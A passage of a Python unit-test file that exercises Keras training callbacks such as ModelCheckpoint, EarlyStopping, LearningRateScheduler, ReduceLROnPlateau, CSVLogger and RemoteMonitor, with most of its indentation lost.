def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'temp.h5')
self.assertFalse(os.path.exists(filepath))
os.mkdir(filepath)
self.assertTrue(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(
IOError, 'Please specify a non-directory '
'filepath for ModelCheckpoint.'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_with_bad_path_placeholders(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5')
callback = keras.callbacks.ModelCheckpoint(filepath=filepath)
with self.assertRaisesRegex(KeyError, 'Failed to format this callback '
'filepath.*'):
model.fit(train_ds, epochs=1, callbacks=[callback])
def test_ModelCheckpoint_nonblocking(self):
filepath = self.get_temp_dir()
# Should only cause a sync block when saving is actually performed.
callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100)
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=0)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
raise RuntimeError(
'If this error is seen, ModelCheckpoint is causing a blocking '
'NumPy conversion even when not checkpointing.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
cb_list.on_predict_begin(logs)
cb_list.on_predict_batch_begin(logs)
cb_list.on_predict_batch_end(logs)
cb_list.on_predict_end(logs)
def test_verbose_2_logging(self):
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
expected_log = r'(.*- loss:.*- acc.*:.*epoch)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(data, labels, verbose=2, epochs=20)
self.assertRegex(printed.contents(), expected_log)
def test_ProgbarLogger_verbose_2_nonblocking(self):
# Should only cause a sync block on epoch end methods.
callback = keras.callbacks.ProgbarLogger(count_mode='steps')
self.assertTrue(callback._supports_tf_logs)
model = keras.Sequential([keras.layers.Dense(1)])
cb_list = keras.callbacks.CallbackList([callback],
model=model,
epochs=1,
steps=10,
verbose=2)
tensor = tf.convert_to_tensor(1.)
def mock_numpy():
      raise RuntimeError(
          'If this error is seen, ProgbarLogger is causing a blocking '
          'NumPy conversion outside of epoch end.')
tensor.numpy = mock_numpy
logs = {'metric': tensor}
cb_list.on_train_begin(logs)
cb_list.on_epoch_begin(0, logs)
cb_list.on_train_batch_begin(0, logs)
cb_list.on_train_batch_end(0, logs)
cb_list.on_test_begin(logs)
cb_list.on_test_batch_begin(0, logs)
cb_list.on_test_batch_end(0, logs)
cb_list.on_test_end(logs)
with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'):
# on_epoch_end should still block.
cb_list.on_epoch_end(0, logs)
cb_list.on_train_end(logs)
def test_EarlyStopping(self):
with self.cached_session():
np.random.seed(123)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cases = [
('max', 'val_acc'),
('min', 'val_loss'),
('auto', 'val_acc'),
('auto', 'loss'),
('unknown', 'unknown')
]
for mode, monitor in cases:
patience = 0
cbks = [
keras.callbacks.EarlyStopping(
patience=patience, monitor=monitor, mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
def test_EarlyStopping_reuse(self):
with self.cached_session():
np.random.seed(1337)
patience = 3
data = np.random.random((100, 1))
labels = np.where(data > 0.5, 1, 0)
model = keras.models.Sequential((keras.layers.Dense(
1, input_dim=1, activation='relu'), keras.layers.Dense(
1, activation='sigmoid'),))
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
weights = model.get_weights()
# This should allow training to go for at least `patience` epochs
model.set_weights(weights)
stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_with_baseline(self):
with self.cached_session():
np.random.seed(1337)
baseline = 0.6
(data, labels), _ = testing_utils.get_test_data(
train_samples=100,
test_samples=50,
input_shape=(1,),
num_classes=NUM_CLASSES)
model = testing_utils.get_small_sequential_mlp(
num_hidden=1, num_classes=1, input_dim=1)
model.compile(
optimizer='sgd', loss='binary_crossentropy', metrics=['acc'])
stopper = keras.callbacks.EarlyStopping(monitor='acc',
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) == 2
patience = 3
stopper = keras.callbacks.EarlyStopping(monitor='acc',
patience=patience,
baseline=baseline)
hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
assert len(hist.epoch) >= patience
def test_EarlyStopping_final_weights_when_restoring_model_weights(self):
class DummyModel:
def __init__(self):
self.stop_training = False
self.weights = -1
def get_weights(self):
return self.weights
def set_weights(self, weights):
self.weights = weights
def set_weight_to_epoch(self, epoch):
self.weights = epoch
early_stop = keras.callbacks.EarlyStopping(monitor='val_loss',
patience=2,
restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.2, 0.15, 0.1, 0.11, 0.12]
    # The best configuration is in epoch 2 (loss = 0.1000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
# The best configuration is in epoch 2 (loss = 0.1000),
# and while patience = 2, we're restoring the best weights,
# so we end up at the epoch with the best weights, i.e. epoch 2
self.assertEqual(early_stop.model.get_weights(), 2)
# Check early stopping when no model beats the baseline.
early_stop = keras.callbacks.EarlyStopping(
monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True)
early_stop.model = DummyModel()
losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73]
    # The best configuration is in epoch 2 (loss = 0.7000).
epochs_trained = 0
early_stop.on_train_begin()
for epoch in range(len(losses)):
epochs_trained += 1
early_stop.model.set_weight_to_epoch(epoch=epoch)
early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
if early_stop.model.stop_training:
break
    # No epoch improves on the baseline, so training stops after 5 epochs
    # (patience = 5) and the weights from epoch 2, which had the lowest
    # observed val_loss, are restored.
self.assertEqual(epochs_trained, 5)
self.assertEqual(early_stop.model.get_weights(), 2)
def test_RemoteMonitor(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
monitor = keras.callbacks.RemoteMonitor()
    # This will raise a warning since the default address is unreachable:
monitor.on_epoch_end(0, logs={'loss': 0.})
def test_LearningRateScheduler(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
cbks = [
keras.callbacks.LearningRateScheduler(
lambda x: 1. / (1. + x), verbose=1)
]
io_utils.enable_interactive_logging()
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5)
self.assertIn('LearningRateScheduler setting learning rate to 1.0',
printed.contents())
      assert abs(
          float(keras.backend.get_value(
              model.optimizer.lr)) - 0.2) < keras.backend.epsilon()
cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
      assert abs(
          float(keras.backend.get_value(
              model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon()
cbks = [
keras.callbacks.LearningRateScheduler(
lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2)
(epoch))
]
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2)))
decayed_learning_rate = 0.01 * cosine_decay_np
      assert abs(float(keras.backend.get_value(model.optimizer.lr)) -
                 decayed_learning_rate) < keras.backend.epsilon()
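      # For reference: the last scheduler call is CosineDecay(0.01, 2)(1)
      # = 0.01 * 0.5 * (1 + cos(pi * 1/2)) = 0.005, which is exactly what
      # `decayed_learning_rate` recomputes above.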
def test_ReduceLROnPlateau(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
tf.compat.v1.set_random_seed(1234)
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1))
return model
# TODO(psv): Make sure the callback works correctly when min_delta is
# set as 0. Test fails when the order of this callback and assertion is
# interchanged.
model = make_model()
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=0,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4)
model = make_model()
      # This should reduce the LR after the first epoch (due to the high min_delta).
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss',
factor=0.1,
min_delta=10,
patience=1,
cooldown=5)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=2)
self.assertAllClose(
float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4)
def test_ReduceLROnPlateau_patience(self):
class DummyOptimizer:
def __init__(self):
self.lr = keras.backend.variable(1.0)
class DummyModel:
def __init__(self):
self.optimizer = DummyOptimizer()
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', patience=2)
reduce_on_plateau.model = DummyModel()
losses = [0.0860, 0.1096, 0.1040]
lrs = []
for epoch in range(len(losses)):
reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]})
lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr))
# The learning rates should be 1.0 except the last one
for lr in lrs[:-1]:
self.assertEqual(lr, 1.0)
self.assertLess(lrs[-1], 1.0)
def test_ReduceLROnPlateau_backwards_compatibility(self):
with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log:
reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13)
self.assertRegex(
str(mock_log.call_args), '`epsilon` argument is deprecated')
self.assertFalse(hasattr(reduce_on_plateau, 'epsilon'))
self.assertTrue(hasattr(reduce_on_plateau, 'min_delta'))
self.assertEqual(reduce_on_plateau.min_delta, 1e-13)
def test_CSVLogger(self):
with self.cached_session():
np.random.seed(1337)
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'log.tsv')
sep = '\t'
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
def make_model():
np.random.seed(1337)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='categorical_crossentropy',
optimizer=gradient_descent.SGD(lr=0.1),
metrics=['accuracy'])
return model
# case 1, create new file with defined separator
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
with open(filepath) as csvfile:
dialect = csv.Sniffer().sniff(csvfile.read())
assert dialect.delimiter == sep
del model
del cbks
# case 2, append data to existing file, skip header
model = make_model()
cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# case 3, reuse of CSVLogger object
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
with open(filepath) as csvfile:
list_lines = csvfile.readlines()
for line in list_lines:
assert line.count(sep) == 4
assert len(list_lines) == 5
output = ' '.join(list_lines)
assert len(re.findall('epoch', output)) == 1
os.remove(filepath)
def test_stop_training_csv(self):
# Test that using the CSVLogger callback with the TerminateOnNaN callback
# does not result in invalid CSVs.
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
fp = os.path.join(tmpdir, 'test.csv')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)]
model = keras.models.Sequential()
for _ in range(5):
model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='linear'))
model.compile(loss='mean_squared_error',
optimizer='rmsprop')
def data_generator():
i = 0
max_batch_index = len(x_train) // BATCH_SIZE
tot = 0
while 1:
if tot > 3 * len(x_train):
yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan,
np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan)
else:
yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE],
y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE])
i += 1
tot += 1
i %= max_batch_index
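      # Once the batch counter `tot` exceeds 3 * len(x_train), the generator
      # switches to all-NaN batches, so TerminateOnNaN halts training partway
      # through and the file written by CSVLogger must still parse as valid
      # CSV (checked below).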
history = model.fit_generator(data_generator(),
len(x_train) // BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
assert len(loss) > 1
assert loss[-1] == np.inf or np.isnan(loss[-1])
values = []
with open(fp) as f:
# On Windows, due to \r\n line ends, we may end up reading empty lines
# after each line. Skip empty lines.
values = [x for x in csv.reader(f) if x]
assert 'nan' in values[-1], 'The last epoch was not logged.'
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_TerminateOnNaN(self):
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
cbks = [keras.callbacks.TerminateOnNaN()]
model = keras.models.Sequential()
initializer = keras.initializers.Constant(value=1e5)
for _ in range(5):
model.add(
keras.layers.Dense(
2,
input_dim=INPUT_DIM,
activation='relu',
kernel_initializer=initializer))
model.add(keras.layers.Dense(NUM_CLASSES))
model.compile(loss='mean_squared_error', optimizer='rmsprop')
history = model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=20)
loss = history.history['loss']
self.assertEqual(len(loss), 1)
self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0]))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
      # Start an arbitrary thread that should run during model
      # training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitor_np_array(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
      a = np.arange(1)  # a one-element ndarray
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
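      # With send_as_json=True the one-element ndarray is expected to be
      # converted to a plain Python scalar before being posted.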
send = {'loss': 0., 'epoch': 0, 'val': 0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitor_np_float32(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post:
monitor = keras.callbacks.RemoteMonitor(send_as_json=True)
a = np.float32(1.0) # a float32 generic type
logs = {'loss': 0., 'val': a}
monitor.on_epoch_end(0, logs=logs)
send = {'loss': 0., 'epoch': 0, 'val': 1.0}
requests_post.assert_called_once_with(
monitor.root + monitor.path, json=send, headers=monitor.headers)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
return None
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with tf.compat.v1.test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
def test_progbar_infers_steps(self):
x, y = np.ones((10, 1)), np.ones((10, 1))
data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2)
data = data.filter(lambda x, y: True) # Unknown cardinality.
progbar = keras.callbacks.ProgbarLogger('steps')
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
self.assertIsNone(progbar.target)
model.fit(data, epochs=2, callbacks=[progbar])
self.assertEqual(progbar.target, 5)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_callback_passed_floats(self):
class MyCallback(keras.callbacks.Callback):
def on_batch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_batch_end_called = True
def on_epoch_end(self, batch, logs=None):
assert isinstance(batch, int)
assert isinstance(logs['loss'], float)
self.on_epoch_end_called = True
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
callback = MyCallback()
model.fit(x, y, epochs=2, callbacks=[callback])
self.assertTrue(callback.on_batch_end_called)
    self.assertTrue(callback.on_epoch_end_called)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks(self):
class MyCallbackWithBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
class MyCallbackWithTFBatchHooks(keras.callbacks.Callback):
def __init__(self):
super(MyCallbackWithTFBatchHooks, self).__init__()
self._supports_tf_logs = True
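        # Declaring support for tf logs tells CallbackList that this callback
        # can receive raw tensors in `logs` without an eager numpy conversion.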
class MyCallbackWithoutBatchHooks(keras.callbacks.Callback):
def __init__(self):
self.epochs = 0
def on_epoch_end(self, epoch, logs=None):
self.epochs += 1
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallbackWithBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
self.assertFalse(cb_list._batch_hooks_support_tf_logs)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallbackWithTFBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._batch_hooks_support_tf_logs)
my_cb = MyCallbackWithoutBatchHooks()
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertLen(cb_list.callbacks, 1)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_logs_conversion(self):
assert_dict_equal = self.assertDictEqual
class MutateNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['numpy'] = 1
class MutateTensorFlowLogs(CallAllHooks):
def __init__(self):
super(MutateTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
def _run(self, *args, logs=None):
logs = logs or args[-1]
logs['tf'] = 2
class AssertNumpyLogs(CallAllHooks):
def _run(self, *args, logs=None):
logs = logs or args[-1]
assert_dict_equal(logs, {'all': 0, 'numpy': 1, 'tf': 2})
class AssertTensorFlowLogs(AssertNumpyLogs):
def __init__(self):
super(AssertTensorFlowLogs, self).__init__()
self._supports_tf_logs = True
cb_list = keras.callbacks.CallbackList([
MutateNumpyLogs(),
MutateTensorFlowLogs(),
AssertNumpyLogs(),
AssertTensorFlowLogs()
])
assert len(cb_list.callbacks) == 4
cb_list.on_epoch_begin(0, logs={'all': 0})
cb_list.on_epoch_end(0, logs={'all': 0})
cb_list.on_predict_batch_begin(0, logs={'all': 0})
cb_list.on_predict_batch_end(0, logs={'all': 0})
cb_list.on_predict_begin(logs={'all': 0})
cb_list.on_predict_end(logs={'all': 0})
cb_list.on_test_batch_begin(0, logs={'all': 0})
cb_list.on_test_batch_end(0, logs={'all': 0})
cb_list.on_test_begin(logs={'all': 0})
cb_list.on_test_end(logs={'all': 0})
cb_list.on_train_batch_begin(0, logs={'all': 0})
cb_list.on_train_batch_end(0, logs={'all': 0})
cb_list.on_train_begin(logs={'all': 0})
cb_list.on_train_end(logs={'all': 0})
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_implements_batch_hooks_override(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self, should_run=True):
self.should_run = should_run
self.train_batches = 0
self.test_batches = 0
self.predict_batches = 0
def on_train_batch_end(self, batch, logs=None):
self.train_batches += 1
def on_test_batch_end(self, batch, logs=None):
self.test_batches += 1
def on_predict_batch_end(self, batch, logs=None):
self.predict_batches += 1
def _implements_train_batch_hooks(self):
return self.should_run
def _implements_test_batch_hooks(self):
return self.should_run
def _implements_predict_batch_hooks(self):
return self.should_run
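    # CallbackList consults the `_implements_*_batch_hooks` overrides above to
    # decide whether per-batch dispatch is needed; both answers are exercised
    # below.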
x, y = np.ones((10, 1)), np.ones((10, 1))
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
my_cb = MyCallback(should_run=True)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertTrue(cb_list._should_call_train_batch_hooks)
self.assertTrue(cb_list._should_call_test_batch_hooks)
self.assertTrue(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 2)
self.assertEqual(my_cb.test_batches, 1)
self.assertEqual(my_cb.predict_batches, 1)
my_cb = MyCallback(should_run=False)
cb_list = keras.callbacks.CallbackList([my_cb], verbose=0)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
model.fit(x, y, epochs=2, batch_size=10, callbacks=[my_cb], verbose=0)
model.evaluate(x, y, batch_size=10, callbacks=[my_cb], verbose=0)
model.predict(x, batch_size=10, callbacks=[my_cb], verbose=0)
self.assertEqual(my_cb.train_batches, 0)
self.assertEqual(my_cb.test_batches, 0)
self.assertEqual(my_cb.predict_batches, 0)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_default_callbacks_do_not_call_batch_hooks(self):
model = keras.Sequential([keras.layers.Dense(1)])
log_dir = self.get_temp_dir()
cb_list = keras.callbacks.CallbackList([
keras.callbacks.TensorBoard(log_dir, profile_batch=0),
keras.callbacks.ModelCheckpoint(log_dir),
],
add_progbar=True,
model=model,
verbose=2,
epochs=3)
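    # With this configuration (profiling disabled, epoch-level checkpointing,
    # progress bar added via `add_progbar`), none of the built-in callbacks
    # should require per-batch hook dispatch, as the assertions below verify.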
self.assertLen(cb_list.callbacks, 3)
self.assertFalse(cb_list._should_call_train_batch_hooks)
self.assertFalse(cb_list._should_call_test_batch_hooks)
self.assertFalse(cb_list._should_call_predict_batch_hooks)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_change_tf_functions_during_fit(self):
class ChangeFunctions(keras.callbacks.Callback):
def on_epoch_end(self, epochs, logs=None):
def new_fn(iterator):
raise ValueError('New function substituted successfully.')
self.model.train_function = new_fn
self.model.test_function = new_fn
self.model.predict_function = new_fn
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
x, y = np.ones((10, 10)), np.ones((10, 1))
with self.assertRaisesRegexp(ValueError, 'New function '):
model.fit(x, y, batch_size=2, epochs=2, callbacks=[ChangeFunctions()])
with self.assertRaisesRegexp(ValueError, 'New function '):
model.evaluate(x, y, batch_size=2)
with self.assertRaisesRegexp(ValueError, 'New function '):
model.predict(x, batch_size=2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_stop_training_batch_level(self):
class MyCallback(keras.callbacks.Callback):
def __init__(self):
super(MyCallback, self).__init__()
self.batch_counter = 0
def on_train_batch_end(self, batch, logs=None):
self.batch_counter += 1
if batch == 2:
self.model.stop_training = True
model = keras.Sequential([keras.layers.Dense(1)])
model.compile('sgd', 'mse')
